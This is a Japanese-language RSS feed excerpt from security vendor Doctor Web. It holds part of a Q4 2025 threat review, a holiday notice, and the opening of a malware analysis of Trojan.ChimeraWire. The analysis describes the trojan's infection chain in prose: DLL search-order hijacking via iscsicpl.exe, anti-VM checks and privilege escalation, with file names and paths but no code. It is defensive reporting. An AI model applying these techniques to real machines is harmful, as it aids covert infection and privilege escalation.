&lt;p&gt;最も多く検出された暗号化ランサムウェアは &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;、&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Encoder.29750&amp;lng=ja"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; となっています。&lt;/p&gt;

&lt;p&gt;2025年10月、Doctor WebはメッセンジャーアプリTelegram Xの改変版に潜んで拡散されていた危険なバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; を発見しました。このバックドアはTelegramアカウントのログインIDとパスワードなどといった機密情報を窃取します。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; を使用することで、脅威アクターはハッキングしたアカウントだけでなくメッセンジャーそのものを完全にコントロールすることができ、ユーザーに成り代わってさまざまな操作を実行することが可能です。&lt;/p&gt;

&lt;p&gt;11月、Doctor Webのアンチウイルスラボはハッカー集団「Cavalry Werewolf」によるロシア政府機関を狙った標的型攻撃に関する調査レポートを&lt;a href="https://news.drweb.co.jp/show/?lng=ja&amp;i=15078" target="_blank"&gt;公開&lt;/a&gt;しました。この調査において、Doctor WebのエキスパートはCavalry Werewolfが攻撃キャンペーンで使用していた多数の悪意のあるツールを特定することに成功しています。それらのツールにはオープンソースツールも含まれていました。また同調査レポートでは、ハッカー集団Cavalry Werewolfの特徴やこれらのサイバー犯罪者たちが侵害されたネットワーク内で実行する典型的なアクションについても解説しています。&lt;/p&gt;

&lt;p&gt;12月には、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.ChimeraWire&amp;lng=ja"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; と名づけられたユニークなマルウェアについて記事を&lt;a href="https://news.drweb.co.jp/show/?i=15090&amp;lng=ja" target="_blank"&gt;公開&lt;/a&gt;しました。このマルウェアはWebサイトのボット対策機能にブロックされないよう人間になりすましてサイトの人気度を人為的に高めます。そのために、まず検索エンジン内で目的のサイトを自動的に検索して開き、次に悪意のあるアクターから受け取ったパラメータに従ってそのWebページ上でユーザーの操作を模倣してリンクをクリックします。&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.ChimeraWire&amp;lng=ja"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; はDLL検索順序ハイジャッキング脆弱性を悪用する悪意のあるプログラムを複数使用することでコンピューターを感染させ、検出を回避するためにアンチデバッグ手法も用います。&lt;/p&gt;

&lt;p&gt;第4四半期を通して、素早く簡単に稼ぐことができると約束する新たな詐欺サイトがDoctor Webのインターネットアナリストによって特定されています。フィッシングサイトや偽のマーケットプレイスサイトも新たなものが確認されました。&lt;/p&gt;

&lt;p&gt;Google Playでは引き続き新たな悪意のあるアプリが発見されています。それらの中にはAndroidユーザーを有料サービスに登録するトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; や、さまざまな詐欺スキームに用いられる悪意のあるアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; が含まれていました。また、Dr.Web Security Space for mobile devicesによって収集された検出統計から、Android向けバンキング型トロイの木馬の活動が活発化していることが明らかになりました。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;2025年第4四半期の主な傾向&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;検出された脅威の合計数が増加&lt;/li&gt;
        &lt;li&gt;攻撃に使用されるユニークな脅威の数が減少&lt;/li&gt;
        &lt;li&gt;ランサムウェアに暗号化されたファイルの復号化リクエスト数が増加&lt;/li&gt;
        &lt;li&gt;Androidユーザーを標的としたバンキング型トロイの木馬の活動が活発化&lt;/li&gt;
        &lt;li&gt;AndroidユーザーのTelegramアカウントをハッキングするバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; が拡散される&lt;/li&gt;
        &lt;li&gt;Google Playに新たな悪意のあるアプリが出現&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Doctor Webサーバーによる統計&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2025年第4四半期に最も多く検出された脅威：&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;感染したシステムにさまざまなマイニング型トロイの木馬やアドウェアをダウンロードするよう設計された、Go言語で記述されたトロイの木馬です。このマルウェアは &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt; に置かれるDLLファイルで、Torrentクライアント「uTorrent」のDLL検索順序ハイジャッキング脆弱性を悪用することで起動します。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;海賊版ソフトウェアのインストーラとして拡散されていることの多いアドウェアです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;span class="string"&gt;mode extensions&lt;/span&gt;、&lt;span class="string"&gt;разработчика&lt;/span&gt;、&lt;span class="string"&gt;розробника&lt;/span&gt; というテキストを含むウィンドウを無限ループで検索し、Escapeキー押下イベントを送信してそれらを強制的に閉じる悪意のあるスクリプトです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4268&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;WinSafeブラウザ拡張機能の悪意のあるコンポーネントの検出名です。このコンポーネントはブラウザに迷惑な広告を表示させるJavaScriptファイルです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Siggen.33379&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;広告を表示させるために別のマルウェアによってシステムにインストールされる偽の「Adblok Plus」（ブラウザ用広告ブロッカー）です。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;メールトラフィック内で検出された脅威の統計&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Microsoft Officeドキュメントの脆弱性を悪用するダウンローダ型トロイの木馬のファミリーです。感染させたコンピューターに別の悪意のあるプログラムをダウンロードすることもできます。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Microsoft Officeソフトウェアの脆弱性を悪用し、攻撃者が任意のコードを実行できるようにするエクスプロイトです。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;AutoItスクリプト言語で記述された悪意のあるアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.AutoIt.289&amp;lng=ja"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; の、パックされたバージョンの検出名です。マイニング型トロイの木馬やバックドア、自己増殖型モジュールなど複数の悪意のあるアプリグループの一部として拡散されます。&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.AutoIt.289&amp;lng=ja"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; はメインのペイロードの検出を困難にする、さまざまな悪意のある動作を実行します。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.791&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;フィッシングページを生成する悪意のあるJavaScriptスクリプトです。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;暗号化ランサムウェア&lt;/h3&gt;

&lt;p&gt;2025年第4四半期にDoctor Webテクニカルサポートサービスに寄せられた、ランサムウェアによって暗号化されたファイルの復号化リクエスト数は、2025年第3四半期と比較して1.15%増加しました。&lt;/p&gt;

&lt;p&gt;Doctor Webのテクニカルサポートサービスに寄せられた復号化リクエスト数の推移：&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2025年第4四半期に最も多く確認された暗号化ランサムウェア（ユーザーからのリクエスト全体に占める割合）：&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24.90%&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 4.21%&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Encoder.29750&amp;lng=ja"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3.42%&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Encoder.26996&amp;lng=ja"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2.68%&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356 &lt;/b&gt; — 0.38%&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;インターネット詐欺&lt;/h3&gt;

&lt;p&gt;2025年第4四半期、Doctor Webのインターネットアナリストは新たな偽のマーケットプレイスサイトが出現していることを確認しました。詐欺師はマーケットプレイスを装ったサイトで、ルーレットに似た回転式のゲームに参加して賞品を獲得するようユーザーを誘っています。ユーザーは何度か挑戦した後「ツキが回って」きますが、賞品を受け取るためにまず送料を、そして次は保険料、その次は税金、などといった具合に次から次へと支払いを求められます。中には、賞品の在庫がないため代わりに現金で受け取ることができると告げられるケースも確認されています。ユーザーが同意すると、この場合も保険料やアカウント有効化のためなどと称して支払いを要求されます。 &lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;「賞品の抽選」を提供する偽のマーケットプレイスサイトの例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;第4四半期には、架空の劇場チケットを販売するサイトもDoctor Webの望ましくないサイトや悪意のあるサイトのデータベースに追加されました。こうしたサイトでは人気の舞台公演チケットを、多くの場合魅力的な価格で提供しています。しかしながら、購入代金を支払ったユーザーがチケットを受け取ることはなく、詐欺師にお金をあげてしまうも同然の結果に終わります。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;存在しない劇場チケットを販売する詐欺サイトの1つ&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;他にも、プライベートシアターのサイトを装って映画チケットを販売するサイトが発見されています。これらのサイトでも、購入代金を支払った被害者がチケットを受け取ることはありません。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;プライベートシアターの偽サイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;フィッシングサイトも複数発見され、そのうちのいくつかはPCゲームプラットフォーム「Steam」の偽サイトでした。悪意のあるアクターは、偽の認証画面でアカウント名とパスワードを入力するよう求めることでユーザーのアカウントデータを窃取しようとしていました。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;本物の「Steam」サイトを模倣し、アカウントにログインするよう求めるフィッシングサイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;存在しない投資プラットフォームにユーザーを誘い込む手法も引き続き横行しています。発見されたサイトの1つは米国在住のロシア語話者を標的とし、「Federal Invest」と呼ばれるプロジェクトに250ドル投資すれば「3か月で最大90,000ドル得ることができる」と持ちかけています。さらに、このプロジェクトの発足にはドナルド・トランプ氏が関わっていると主張しています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;「儲かる投資プロジェクト」に参加できると持ちかける詐欺サイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;また別の詐欺サイトはウズベキスタンのユーザーを標的に大手持株会社と関連があるとするプロジェクトを宣伝し、このプロジェクトに参加すれば最初の1か月だけで1500万スム以上の収入を得ることができるとうたっています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;「投資プロジェクト」に参加することで多額の利益を得ることができるとウズベキスタンの住民に約束する詐欺サイト&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;モバイルデバイスを脅かす悪意のあるプログラムや望ましくないプログラム&lt;/h3&gt;

&lt;p&gt;Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年第4四半期には広告を表示させるトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; と &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; が、活動には減少がみられたものの、引き続き最も多く検出された脅威となりました。&lt;b&gt;Android.Siggen&lt;/b&gt; ファミリーに属する多様な機能を持つマルウェアが3位に上昇しています。バンキング型トロイの木馬の活動は第4四半期を通して活発化し、なかでも最も大きな増加をみせたのは &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; ファミリーでした。&lt;/p&gt;

&lt;p&gt;最も多く検出された望ましくないアプリケーションは、クラウドサービスCloudInjectを使用して改造されたアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt; となりました。最も多く検出されたリスクウェアはNP Managerユーティリティを使用して改造されたアプリ &lt;b&gt;Tool.NPMod&lt;/b&gt; となり、最も多く検出されたアドウェアは開発者によってAndroidアプリに組み込まれるモジュール &lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Adpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; でした。&lt;/p&gt;

&lt;p&gt;10月、Doctor WebはメッセンジャーアプリTelegram Xの改変版に埋め込まれた危険なバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; を発見しました。このマルウェアは機密情報を窃取し、動作ロジックを変更することで攻撃者が被害者のアカウントとメッセンジャー自体の両方を操作できるようにします。&lt;/p&gt;

&lt;p&gt;Google Playでは第4四半期を通して新たな脅威が発見され、それらの中にはユーザーを有料サービスに登録するトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; や、詐欺スキームに用いられる悪意のあるアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; が含まれていました。&lt;/p&gt;

&lt;p&gt;2025年第4四半期のモバイルマルウェアに関連した注目すべきイベント：&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;アドウェア型トロイの木馬が引き続き最も多く検出されたAndroid脅威となる&lt;/li&gt;
    &lt;li&gt;バンキング型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; の活動が増加&lt;/li&gt;
    &lt;li&gt;メッセンジャーアプリTelegram Xの改変版に潜む危険なバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; が発見される&lt;/li&gt;
    &lt;li&gt;Google Playに新たな悪意のあるアプリが出現&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;2025 年第4四半期のモバイルデバイスを取り巻くセキュリティ脅威の状況についての詳細は&lt;a href="https://news.drweb.co.jp/show/?i=15101" target="_blank"&gt;こちらのレビュー&lt;/a&gt;をご覧ください。&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15093&amp;lng=ja</guid><title>年末年始休業のお知らせ</title><link>https://news.drweb.co.jp/show/?i=15093&amp;lng=ja&amp;c=5</link><pubDate>Fri, 12 Dec 2025 00:00:00 GMT</pubDate><description>&lt;p style="text-align: right;"&gt;&lt;b&gt;2025年12月12日&lt;/b&gt;&lt;/p&gt;
&lt;p style="text-align: right;"&gt;&lt;b&gt;株式会社Doctor Web Pacific&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;年末・年始は下記の期間休業させていただきます。&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;div class="alert"&gt;
    &lt;p&gt;2025年12月29日（月）～2026年1月4日（日）&lt;/p&gt;
&lt;/div&gt;

&lt;p&gt;年明けは、2026年1月5日（月）9:30より通常通り営業いたします。&lt;/p&gt;

</description></item><item><guid>https://news.drweb.co.jp/show/?i=15090&amp;lng=ja</guid><title>キメラ退治の英雄ベレロフォンも驚愕：巧みに人間になりすましサイトの人気度を高めるトロイの木馬ChimeraWire</title><link>https://news.drweb.co.jp/show/?i=15090&amp;lng=ja&amp;c=5</link><pubDate>Wed, 10 Dec 2025 01:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2025年12月10日&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;序論&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Webのエキスパートは、アフィリエイトプログラムの1つを解析中にクリッカー機能を備えたユニークなマルウェアを発見しました。&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;と名づけられたこのマルウェアはWebサイトやWebアプリケーションの管理を自動化するオープンソースプロジェクト&lt;a href="https://github.com/sohaha/zlsgo" target="_blank"&gt;zlsgo&lt;/a&gt;と&lt;a href="https://go-rod.github.io/" target="_blank"&gt;Rod&lt;/a&gt;をベースにしたもので、Microsoft Windows搭載コンピューターを標的としています。&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;この&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;を使用することで、サイバー犯罪者はユーザーによる操作を装ってWebサイト内のユーザー行動を向上させ、そのサイトが検索エンジンでの検索結果に表示される順位を人為的に引き上げることができます。そのために、このマルウェアは検索エンジンGoogleとBing内で目的のサイトを探してそれらを開き、そのサイト上でユーザーの操作を模倣してリンクをクリックします。&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;はすべての悪意のある動作を、特定のドメインからダウンロードしてWebSocketプロトコル経由のデバッグモードで起動させたGoogle Chromeブラウザ内にて実行します。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;は複数の悪意のあるダウンローダを通じてコンピューターに侵入します。これらのダウンローダはDLL検索順序ハイジャッキング脆弱性の悪用をベースとするさまざまな権限昇格手法や、検出を回避するためのアンチデバッグ手法を用います。Doctor Webのアンチウイルスラボでは、これらのマルウェアが関与する感染チェーンを少なくとも2つ追跡しています。そのうちの1つでは悪意のあるスクリプト&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;が中心的役割を担い、もう1つのチェーンでは&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;が中心となっています。この&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;の動作原理は悪意のあるスクリプト&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;のものとほぼ同じであり、実質的にその代替として使用されています。&lt;/p&gt;

&lt;p&gt;本稿では、&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;の特徴と、このトロイの木馬をユーザーのデバイス上に送り込むために用いられる悪意のあるアプリについて解説します。&lt;/p&gt;

&lt;h3&gt;1つ目の感染チェーン&lt;/h3&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_en.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;１つ目の感染チェーンを示す図&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;１つ目の感染チェーンは&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54600&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;から始まります。このマルウェアはそれが人工的な環境で動作しているかどうかを検証し、仮想マシンやデバッグモードの徴候を検知すると動作を終了します。そのような徴候がない場合はC2サーバーからZIPアーカイブ&lt;span class="string"&gt;python3.zip&lt;/span&gt;をダウンロードします。これには悪意のあるスクリプト&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;と、その動作に必要な追加のファイル（&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Starter.8377&amp;lng=ja"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;である悪意のあるライブラリ&lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt;など）がいくつか含まれており、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54600&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;はこのアーカイブを解凍してスクリプトを実行します。このスクリプト&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;はC2サーバーから次の段階を受信するダウンローダで、感染の第2段階を担います。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;の動作は実行時の権限によって異なります。管理者権限なしで実行された場合はその権限を取得しようと試みます。そのために、&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;と一緒に抽出された&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Starter.8377&amp;lng=ja"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;がディレクトリ&lt;span class="string"&gt;%LOCALAPPDATA%\Microsoft\WindowsApps&lt;/span&gt;にコピーされ、さらにスクリプト&lt;span class="string"&gt;runs.vbs&lt;/span&gt;が作成されます。このスクリプトは後に&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;を再度実行するために使用されます。&lt;/p&gt;

&lt;p&gt;次に、&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;はシステムアプリ&lt;span class="string"&gt;%SystemRoot%\SysWOW64\iscsicpl.exe&lt;/span&gt;を起動させます。このアプリにはDLL検索順序ハイジャッキング脆弱性が存在するため、正規のWindowsコンポーネントと同じ名前を持つトロイの木馬ライブラリ&lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt;が自動的に読み込まれます。&lt;/p&gt;

&lt;p&gt;続けて、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Starter.8377&amp;lng=ja"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;がVBSスクリプト&lt;span class="string"&gt;runs.vbs&lt;/span&gt;を実行し、このスクリプトが&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;を今度は管理者権限で実行します。&lt;/p&gt;

